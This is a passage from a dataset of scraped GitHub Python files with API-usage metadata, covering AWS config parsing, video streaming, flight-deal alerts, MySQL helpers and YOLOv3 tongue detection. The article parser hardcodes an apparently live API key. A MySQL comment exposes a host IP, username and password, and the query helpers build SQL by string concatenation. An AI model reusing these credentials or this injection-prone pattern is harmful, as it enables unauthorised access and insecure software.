"numpy.floor", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 364, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "41818125580", "text": "import sys\nimport numpy as np\nfrom celery import Celery \n\napp = Celery('test', broker='pyamqp://guest@localhost//')\n\ndis2 = 100\nprint(dis2)\n\n@app.task\ndef testing():\n dis = [10, 30, 100]\n global dis2 \n dis2 = np.min(dis)\n print(dis2)\n\ntesting()\n\nprint(dis2)", "repo_name": "lukegwoolley/Zumo-Robot", "sub_path": "Web control/Flask/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "celery.Celery", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "27533636409", "text": "import os\nimport json\n\n\nfile = \"528884874493_Config_us-east-1_ConfigHistory_AWS__AutoScaling__AutoScalingGroup_20181011T012430Z_20181011T012430Z_1.json\"\n\n\nwith open (file, 'r') as json_file:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n for i in json_str:\n print(i['resourceType'])\n break\n\n\ndef main():\n download_objects(bucket, work_dir)\n file_paths = get_all_file_paths('.')\n unzip_files(file_paths)\n file_paths2 = get_all_file_paths('.')\n for file in file_paths2:\n if file.endswith('.json'):\n with open (file, 'r') as json_file:\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['dBInstanceIdentifier'] = i['configuration']['dBInstanceIdentifier']\n new_dict['dBInstanceClass'] = i['configuration']['dBInstanceClass']\n new_dict['dBInstanceStatus'] = i['configuration']['dBInstanceStatus']\n new_dict['dbiResourceId'] = i['configuration']['dbiResourceId']\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['dBInstanceArn'] = i['configuration']['dBInstanceArn']\n new_dict['instanceCreateTime'] = i['configuration']['instanceCreateTime']\n new_dict['resourceId'] = i['resourceId']\n new_dict['awsAccountId'] = i['awsAccountId']\n try:\n cursor.execute(\"insert into Inventory_awsrds(resourceId, dBInstanceClass, dBInstanceStatus, configurationItemCaptureTime, dBInstanceArn, dBInstanceIdentifier) values (?,?,?,?,?,?)\",str(new_dict['resourceId']),str(new_dict['dBInstanceClass']),str(new_dict['dBInstanceStatus']),str(new_dict['configurationItemCaptureTime']),str(new_dict['dBInstanceArn']),str(new_dict['dBInstanceIdentifier']))\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n os.remove(file)", "repo_name": "the-indian-saint/AWS-Scripts", "sub_path": "DynamoDB/Working/autoScaling.py", "file_name": "autoScaling.py", "file_ext": "py", "file_size_in_byte": 2252, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "38578840964", "text": "import cv2\n\nclass VideoStream:\n\n def __init__(self,width,height):\n self.width = width;\n self.height = height;\n\n def VideoStreaming(self,source):\n video = cv2.VideoCapture(source)\n cv2.namedWindow(\"Stream started ...\",cv2.WINDOW_AUTOSIZE)\n cv2.moveWindow(\"Stream started ...\",500,100)\n cv2.startWindowThread\n try:\n while True:\n ret, frame = video.read()\n if ret:\n resize = cv2.resize(frame,(1280,720))\n videoColor = cv2.cvtColor(resize,cv2.COLOR_BGR2RGB)\n gray = videoColor.copy()\n gray = cv2.cvtColor(gray,cv2.COLOR_BGR2GRAY)\n videoShow = cv2.resize(videoColor,(self.width,self.height))\n videoShow = cv2.cvtColor(videoShow,cv2.COLOR_BGR2RGB)\n cv2.imshow(\"Face-dec Video\",videoShow)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n cv2.destroyAllWindows()\n video.release()\n time.sleep(4)\n except:\n pass\n return 0\n", "repo_name": "digitalknigth/Recognition-Test", "sub_path": "VideoStream.py", "file_name": "VideoStream.py", "file_ext": "py", "file_size_in_byte": 1175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.moveWindow", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.startWindowThread", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "74236237955", "text": "# This file will need to use the DataManager, FlightSearch,\n# FlightData, NotificationManager classes to achieve the program requirements.\n\nimport requests\nimport data_manager, \\\n flight_data, \\\n flight_search, \\\n notification_manager\nimport config\nimport collections\nimport datetime\n\n# --- kiwi api\nCITIES = ['Paris', 'Berlin', 'Tokyo', 'Sydney', 'Istanbul', 'Kuala Lumpur', 'New York', 'San Francisco', 'Cape Town']\nKIWI_API_KEY = config.KIWI_API_KEY\nKIWI_BASE_URL = 'enter base url'\nKIWI_LOCATIONS_ENDPOINT = 'enter locations endpoint'\n\nkiwi_locations_url = KIWI_BASE_URL + KIWI_LOCATIONS_ENDPOINT\n\nkiwi_locations_parameters = {\n 'term': ''\n}\n\nkiwi_locations_headers = {\n 'apikey': KIWI_API_KEY\n}\n\nIATA_CODES = collections.defaultdict()\n# print(IATA_CODES)\n\nfor city in CITIES:\n kiwi_locations_parameters['term'] = city\n response = requests.get(url=kiwi_locations_url, params=kiwi_locations_parameters, headers=kiwi_locations_headers)\n iata_code = response.json()['locations'][0]['code']\n IATA_CODES[city] = iata_code\n# ---\n\ndata_manager = data_manager.DataManager()\n# data_manager.bulk_update_desired_flight_deals_information(IATA_CODES)\n\nflight_search = flight_search.FlightSearch(data_manager_obj=data_manager)\nflights_info = flight_search.get_flights_info(\n date_from=datetime.date.today(),\n date_to=datetime.date.today() + datetime.timedelta(weeks=6),\n nights_in_dst_from=7,\n nights_in_dst_to=28,\n max_stopovers=1,\n via_city='Ho Chi Minh'\n)\n# print(flights_info)\n\nflight_data = flight_data.FlightData(flights_info)\n\nif len(flight_data.flights_data_per_city) > 0:\n notification_manager = notification_manager.NotificationManager()\n\n for cheap_flight_info in flight_data.flights_data_per_city:\n notification_manager.send_sms_notification(cheap_flight_info)\n notification_manager.send_email_notification(cheap_flight_info)\nelse:\n print('No available flights.')\n", "repo_name": "imaadfakier/cheap-flight-deals", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.KIWI_API_KEY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "data_manager.DataManager", "line_number": 39, "usage_type": "call"}, {"api_name": "flight_search.FlightSearch", "line_number": 42, "usage_type": "call"}, {"api_name": "flight_search.get_flights_info", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 44, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 45, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 45, "usage_type": "call"}, {"api_name": "flight_data.FlightData", "line_number": 53, "usage_type": "call"}, {"api_name": "flight_data.flights_data_per_city", "line_number": 55, "usage_type": "attribute"}, {"api_name": "notification_manager.NotificationManager", "line_number": 56, "usage_type": "call"}, {"api_name": "flight_data.flights_data_per_city", "line_number": 58, "usage_type": "attribute"}, {"api_name": "notification_manager.send_sms_notification", "line_number": 59, "usage_type": "call"}, {"api_name": "notification_manager.send_email_notification", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "28640504284", "text": "import requests\nimport articleDateExtractor\n\ndef Parser( url ):\n\n search = 'https://api.aylien.com/api/v1/extract?url=' + url\n\n headers = {\n \"X-AYLIEN-TextAPI-Application-ID\":\"f94984be\",\n \"X-AYLIEN-TextAPI-Application-Key\":\"83a7b904239577d9967e5402c461f388\"\n }\n\n req = requests.get(url = search, headers=headers) \n data = req.json()\n\n date = articleDateExtractor.extractArticlePublishedDate(url)\n #date = articleDateExtractor.extractArticlePublishedDate(\"http://techcrunch.com/2015/11/29/tyro-payments/\")\n\n formattedDate = date\n #print(date)\n if( date != None ):\n formattedDate = str(date).replace(\"-\", \"\")\n formattedDate = formattedDate[:-9]\n formattedDate = int(formattedDate)\n #print(formattedDate)\n\n parsed = {\n 'title': data['title'],\n 'author': data['author'],\n 'article': data['article'],\n 'date': formattedDate\n }\n\n return parsed\n\nprint(Parser('https://www.cnet.com/news/google-plus-and-life-after-social-media-death/'))", "repo_name": "landeneagan/TigerHacks2018", "sub_path": "Parser.py", "file_name": "Parser.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "articleDateExtractor.extractArticlePublishedDate", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4499029222", "text": "from monitoring import watcher\nfrom multiprocessing import Process\n\n# Set the inputs\nfilename_experimental_data1 = \"R1_data_in_moles.csv\"\nfilename_experimental_data2 = \"R2_data_in_moles.csv\"\n\n\nalpha_lower_bound = \"-1000\"\nalpha_upper_bound = \"1000\"\nbeta_lower_bound = \"-1000\"\nbeta_upper_bound = \"1000\"\n\nmodel_for_parest_1 = \"parameter_estimation/model_mu_1\"\nmodel_for_parest_2 = \"parameter_estimation/model_mu_2\"\nmodel_for_parest_3 = \"parameter_estimation/model_mu_3\"\nmodel_for_parest_4 = \"parameter_estimation/model_mu_4\"\n\noutput_1 = \"output_1.csv\"\noutput_2 = \"output_2.csv\"\noutput_3 = \"output_3.csv\"\noutput_4 = \"output_4.csv\"\n\nSheet = 'Sheet1'\nSheet_2 = 'Channel 5'\nSheet_3 = 'Channel 6'\nSheet_4 = 'Channel 7'\n\n# Multiprocessing of the watcher and parameter estimation file\n\np1 = Process(target=watcher,\n args=(output_1, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_1, Sheet))\n\np2 = Process(target=watcher,\n args=(output_2, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_2, Sheet_2))\n\np3 = Process(target=watcher,\n args=(output_3, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_3, Sheet_3))\n\np4 = Process(target=watcher,\n args=(output_4, filename_experimental_data1, filename_experimental_data2, alpha_lower_bound,\n alpha_upper_bound, beta_lower_bound, beta_upper_bound, model_for_parest_4, Sheet_4))\np1.start()\np2.start()\np3.start()\np4.start()\n\ntry:\n p1.join()\n p2.join()\n p3.join()\n p4.join()\n\nexcept KeyboardInterrupt:\n print('program exit')\n", "repo_name": "biosustain/fermentation-mpc", "sub_path": "old_stuff/run_parallel_monitoring.py", "file_name": "run_parallel_monitoring.py", "file_ext": "py", "file_size_in_byte": 1892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "multiprocessing.Process", "line_number": 31, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 31, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 35, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 35, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 39, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 39, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 43, "usage_type": "call"}, {"api_name": "monitoring.watcher", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "5582609700", "text": "#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nfrom typing import List\n\nfrom tree import TreeNode\n\n\n# 二叉树的层序遍历\nclass Solution:\n @staticmethod\n def level_order(root: TreeNode) -> List[List[int]]:\n \"\"\"\n 二叉树层序遍历\n \"\"\"\n if not root:\n return []\n result = []\n queue = [root]\n while queue:\n size = len(queue)\n level_nodes = []\n while size > 0:\n temp = queue.pop(0)\n level_nodes.append(temp.val)\n if temp.left:\n queue.append(temp.left)\n if temp.right:\n queue.append(temp.right)\n size -= 1\n result.append(level_nodes)\n return result\n", "repo_name": "xiaoqiangjava/python-algorithm", "sub_path": "learn/102.py", "file_name": "102.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tree.TreeNode", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "7283432142", "text": "import collections\nimport warnings\nfrom functools import reduce\nfrom typing import Dict, List, Tuple\n\nimport datasets\nfrom datasets import Dataset, DatasetDict\n\n\nclass MergeResplitter:\n \"\"\"Merge existing splits of the dataset and assign them custom names.\n\n Create new `DatasetDict` with new split names corresponding to the merged existing\n splits (e.g. \"train\", \"valid\" and \"test\").\n\n Parameters\n ----------\n merge_config: Dict[str, Tuple[str, ...]]\n Dictionary with keys - the desired split names to values - tuples of the current\n split names that will be merged together\n\n Examples\n --------\n Create new `DatasetDict` with a split name \"new_train\" that is created as a merger\n of the \"train\" and \"valid\" splits. Keep the \"test\" split.\n\n >>> # Assuming there is a dataset_dict of type `DatasetDict`\n >>> # dataset_dict is {\"train\": train-data, \"valid\": valid-data, \"test\": test-data}\n >>> merge_resplitter = MergeResplitter(\n >>> merge_config={\n >>> \"new_train\": (\"train\", \"valid\"),\n >>> \"test\": (\"test\", )\n >>> }\n >>> )\n >>> new_dataset_dict = merge_resplitter(dataset_dict)\n >>> # new_dataset_dict is\n >>> # {\"new_train\": concatenation of train-data and valid-data, \"test\": test-data}\n \"\"\"\n\n def __init__(\n self,\n merge_config: Dict[str, Tuple[str, ...]],\n ) -> None:\n self._merge_config: Dict[str, Tuple[str, ...]] = merge_config\n self._check_duplicate_merge_splits()\n\n def __call__(self, dataset: DatasetDict) -> DatasetDict:\n \"\"\"Resplit the dataset according to the `merge_config`.\"\"\"\n self._check_correct_keys_in_merge_config(dataset)\n return self.resplit(dataset)\n\n def resplit(self, dataset: DatasetDict) -> DatasetDict:\n \"\"\"Resplit the dataset according to the `merge_config`.\"\"\"\n resplit_dataset = {}\n for divide_to, divided_from__list in self._merge_config.items():\n datasets_from_list: List[Dataset] = []\n for divide_from in divided_from__list:\n datasets_from_list.append(dataset[divide_from])\n if len(datasets_from_list) > 1:\n resplit_dataset[divide_to] = datasets.concatenate_datasets(\n datasets_from_list\n )\n else:\n resplit_dataset[divide_to] = datasets_from_list[0]\n return datasets.DatasetDict(resplit_dataset)\n\n def _check_correct_keys_in_merge_config(self, dataset: DatasetDict) -> None:\n \"\"\"Check if the keys in merge_config are existing dataset splits.\"\"\"\n dataset_keys = dataset.keys()\n specified_dataset_keys = self._merge_config.values()\n for key_list in specified_dataset_keys:\n for key in key_list:\n if key not in dataset_keys:\n raise ValueError(\n f\"The given dataset key '{key}' is not present in the given \"\n f\"dataset object. Make sure to use only the keywords that are \"\n f\"available in your dataset.\"\n )\n\n def _check_duplicate_merge_splits(self) -> None:\n \"\"\"Check if the original splits are duplicated for new splits creation.\"\"\"\n merge_splits = reduce(lambda x, y: x + y, self._merge_config.values())\n duplicates = [\n item\n for item, count in collections.Counter(merge_splits).items()\n if count > 1\n ]\n if duplicates:\n warnings.warn(\n f\"More than one desired splits used '{duplicates[0]}' in \"\n f\"`merge_config`. Make sure that is the intended behavior.\",\n stacklevel=1,\n )\n", "repo_name": "adap/flower", "sub_path": "datasets/flwr_datasets/merge_resplitter.py", "file_name": "merge_resplitter.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 44, "usage_type": "name"}, {"api_name": "datasets.DatasetDict", "line_number": 47, "usage_type": "name"}, {"api_name": "datasets.DatasetDict", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 56, "usage_type": "name"}, {"api_name": "datasets.Dataset", "line_number": 56, "usage_type": "name"}, {"api_name": "datasets.concatenate_datasets", "line_number": 60, "usage_type": "call"}, {"api_name": "datasets.DatasetDict", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.DatasetDict", "line_number": 67, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 82, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 85, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "21297266903", "text": "import pandas as pd\nimport os\nimport sqlite3\nimport pyodbc\nimport mysql.connector #pip install mysql-connector-python\nimport MySQLdb\nfrom mysql import *\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import update\nfrom pypika import Query, Table, Field\n\ndef MySql_1(hPort,user,pas,db):\n conn_str = 'mysql+mysqlconnector://' + user + ':' + pas + '@' + hPort + '/' + db\n engine = create_engine(conn_str, echo=False)\n conn = engine.raw_connection()\n return conn\n\ndef MySql_3(host_name, user_name, user_password,db):\n conn = MySQLdb.connect(host_name,user_name,user_password,db)\n return conn\n\n\nclass prep_query:\n def __init__(self, tablename):\n self.cols = \"*\"\n self.tbl = tablename\n self.qry = \"\"\n def q_select(self, cond = False, cols=False):\n if cols == False and cond != False:\n self.qry = \"select \" + self.cols + \" from \" + self.tbl + \" where \" + cond\n elif cols != False and cond != False:\n self.qry = \"select \" + cols + \" from \" + self.tbl + \" where \" + cond\n elif cols != False and cond == False:\n self.qry = \"select \" + cols + \" from \" + self.tbl\n elif cols == False and cond == False:\n self.qry = \"select \" + self.cols + \" from \" + self.tbl\n def q_delete(self, cols , value):\n self.qry = \"DELETE FROM \" + self.tbl + \" WHERE \" + cols + \"='\" + value + \"'\"\n def q_insert(self, cols, values):\n self.qry = \"insert into \" + self.tbl + \" (\" + cols + \") values (\" + values + \")\"\n def q_update(self, cols, values, ref, refvalue):\n self.qry = \"UPDATE \" + self.tbl + \" SET \" + cols + \"='\" + values + \"' WHERE \" + ref + \"='\" + refvalue + \"'\"\n def get(self):\n return self.qry\n\n\n#x = prep_query(\"omtb\")\n##x.q_select()\n#print(x.get())\n#print(x.q_sel(\"asn = '123' and gsn = '5'\", \"col1, col2\"))\n\n\n\ndef prep_qry(tbl, cond, column = False, vals = False):\n if column == False:\n cols = \"*\"\n else:\n cols = column\n #s_select = 'select ' + col + ' from ' + tbl + ' where ' + cond\n #s_update = 'update from ' + tbl + ' from ' + tbl + ' where ' cond\n #s_insert = \"insert into \" + tbl + \" (\" + col + \") values (\" + values + \")\"\n #qry = \"UPDATE \" + tbl + \" SET \" + col + \"='\" + values + \"' WHERE \" + ref + \"='\" + refvalue + \"'\"\n\n\nclass oMySql:\n def __init__(self, connection, tablename):\n self.conn = connection\n self.cr = connection.cursor()\n self.tbl = tablename\n def q_row_count(self):\n sql = \"select * from \" + self.tbl\n df = pd.read_sql(sql, self.conn)\n print(sql,'-' , df.shape[0])\n def q_fetch_all_row(self):\n sql = 'select * from ' + self.tbl\n self.cr.execute(sql)\n rs = self.cr.fetchall()\n ls = []\n for r in rs:\n ls1 = list(r)\n ls.append(ls1)\n print(ls)\n\n\n#q = Query.from_('asdb').select('id', 'fname', 'lname', 'phone')\n#Query.from_('asdb').select('id', 'fname', 'lname', 'phone').orderby('id', order=Order.desc)\n\n\n#cn = MySql_1('38.70.234.101','akomi','1q2w3eaz$','omdb')\n#x = oMySql(cn,'live')\n#x.q_fetch_all_row()\n", "repo_name": "FuckBrains/omEngin", "sub_path": "Z_ALL_FILE/Py/omdb.py", "file_name": "omdb.py", "file_ext": "py", "file_size_in_byte": 3116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "10841686067", "text": "# -------------------------------------#\n# 创建YOLO类\n# 检测有无符合要求的舌头图片,如果有裁剪下来,返回True,如果没有返回False(前端可以提示靠近点或者咋的~)\n# -------------------------------------#\nimport colorsys\nimport os\nimport time\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom algorithm.yolov3.nets.yolo3 import YoloBody\nfrom algorithm.yolov3.utils.utils import (DecodeBox, letterbox_image, non_max_suppression,\n yolo_correct_boxes)\n\nprint(torch.__version__)\nprint(torch.cuda.is_available())\n\n# --------------------------------------------#\n# 使用自己训练好的模型预测需要修改2个参数\n# model_path和classes_path都需要修改!\n# 如果出现shape不匹配,一定要注意\n# 训练时的model_path和classes_path参数的修改\n# --------------------------------------------#\nclass YOLO(object):\n _defaults = {\n # 修改模型路径和分类类别\n # \"model_path\": './yolov3_tongue.pth',\n # \"anchors_path\": './model_data/yolo_anchors.txt',\n # \"classes_path\": './model_data/voc_classes.txt',\n \"model_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"yolov3_tongue.pth\"),\n \"anchors_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"model_data\", \"yolo_anchors.txt\"),\n \"classes_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"model_data\", \"voc_classes.txt\"),\n \"model_image_size\": (416, 416, 3),\n \"confidence\": 0.5,\n \"iou\": 0.3,\n \"cuda\": False,\n # ---------------------------------------------------------------------#\n # 该变量用于控制是否使用letterbox_image对输入图像进行不失真的resize,\n # 在多次测试后,发现关闭letterbox_image直接resize的效果更好\n # ---------------------------------------------------------------------#\n \"letterbox_image\": False,\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n # ---------------------------------------------------#\n # 初始化YOLO\n # ---------------------------------------------------#\n def __init__(self, **kwargs):\n self.__dict__.update(self._defaults)\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.generate()\n\n # ---------------------------------------------------#\n # 获得所有的分类\n # ---------------------------------------------------#\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n # ---------------------------------------------------#\n # 获得所有的先验框\n # ---------------------------------------------------#\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape([-1, 3, 2])[::-1, :, :]\n\n # ---------------------------------------------------#\n # 生成模型\n # ---------------------------------------------------#\n def generate(self):\n self.num_classes = len(self.class_names)\n # ---------------------------------------------------#\n # 建立yolov3模型\n # ---------------------------------------------------#\n self.net = YoloBody(self.anchors, self.num_classes)\n\n # ---------------------------------------------------#\n # 载入yolov3模型的权重\n # ---------------------------------------------------#\n print('Loading weights into state dict...')\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n state_dict = torch.load(self.model_path, map_location=device)\n self.net.load_state_dict(state_dict)\n self.net = self.net.eval()\n\n if self.cuda:\n self.net = nn.DataParallel(self.net)\n self.net = self.net.cuda()\n\n # ---------------------------------------------------#\n # 建立三个特征层解码用的工具\n # ---------------------------------------------------#\n self.yolo_decodes = []\n for i in range(3):\n self.yolo_decodes.append(\n DecodeBox(self.anchors[i], self.num_classes, (self.model_image_size[1], self.model_image_size[0])))\n\n print('{} model, anchors, and classes loaded.'.format(self.model_path))\n # 画框设置不同的颜色\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n\n # ---------------------------------------------------#\n # 检测图片\n # ---------------------------------------------------#\n def detect_image(self, input_path,out_path):\n (_,filename) = os.path.split(input_path)\n filename = filename.split('.')[0]\n\n image = Image.open(input_path)\n\n # ---------------------------------------------------------#\n # 在这里将图像转换成RGB图像,防止灰度图在预测时报错。\n # ---------------------------------------------------------#\n image = image.convert('RGB')\n\n image_shape = np.array(np.shape(image)[0:2])\n # ---------------------------------------------------------#\n # 给图像增加灰条,实现不失真的resize\n # 也可以直接resize进行识别\n # ---------------------------------------------------------#\n if self.letterbox_image:\n crop_img = np.array(letterbox_image(image, (self.model_image_size[1], self.model_image_size[0])))\n else:\n crop_img = image.resize((self.model_image_size[1], self.model_image_size[0]), Image.BICUBIC)\n\n photo = np.array(crop_img, dtype=np.float32) / 255.0\n photo = np.transpose(photo, (2, 0, 1))\n # ---------------------------------------------------------#\n # 添加上batch_size维度\n # ---------------------------------------------------------#\n images = [photo]\n\n with torch.no_grad():\n images = torch.from_numpy(np.asarray(images))\n if self.cuda:\n images = images.cuda()\n\n # ---------------------------------------------------------#\n # 将图像输入网络当中进行预测!\n # ---------------------------------------------------------#\n outputs = self.net(images)\n output_list = []\n for i in range(3):\n output_list.append(self.yolo_decodes[i](outputs[i]))\n\n # ---------------------------------------------------------#\n # 将预测框进行堆叠,然后进行非极大抑制\n # ---------------------------------------------------------#\n output = torch.cat(output_list, 1)\n batch_detections = non_max_suppression(output, self.num_classes, conf_thres=self.confidence,\n nms_thres=self.iou)\n\n # ---------------------------------------------------------#\n # 如果没有检测出物体,返回原图\n # ---------------------------------------------------------#\n try:\n batch_detections = batch_detections[0].cpu().numpy()\n except:\n return input_path,False\n\n # ---------------------------------------------------------#\n # 对预测框进行得分筛选\n # ---------------------------------------------------------#\n top_index = batch_detections[:, 4] * batch_detections[:, 5] > self.confidence\n top_conf = batch_detections[top_index, 4] * batch_detections[top_index, 5]\n top_label = np.array(batch_detections[top_index, -1], np.int32)\n top_bboxes = np.array(batch_detections[top_index, :4])\n top_xmin, top_ymin, top_xmax, top_ymax = np.expand_dims(top_bboxes[:, 0], -1), np.expand_dims(\n top_bboxes[:, 1], -1), np.expand_dims(top_bboxes[:, 2], -1), np.expand_dims(top_bboxes[:, 3], -1)\n\n # -----------------------------------------------------------------#\n # 在图像传入网络预测前会进行letterbox_image给图像周围添加灰条\n # 因此生成的top_bboxes是相对于有灰条的图像的\n # 我们需要对其进行修改,去除灰条的部分。\n # -----------------------------------------------------------------#\n if self.letterbox_image:\n boxes = yolo_correct_boxes(top_ymin, top_xmin, top_ymax, top_xmax,\n np.array([self.model_image_size[0], self.model_image_size[1]]), image_shape)\n else:\n top_xmin = top_xmin / self.model_image_size[1] * image_shape[1]\n top_ymin = top_ymin / self.model_image_size[0] * image_shape[0]\n top_xmax = top_xmax / self.model_image_size[1] * image_shape[1]\n top_ymax = top_ymax / self.model_image_size[0] * image_shape[0]\n boxes = np.concatenate([top_ymin, top_xmin, top_ymax, top_xmax], axis=-1)\n\n # 保存分割出目标检测出��图片\n boxes_crop = boxes[:, [1, 0, 3, 2]]\n # dirs = 'img/out/'\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n out_path = out_path + '/' + filename + '_crop_out.bmp'\n image.crop(boxes_crop[0, :]).save(out_path)\n return 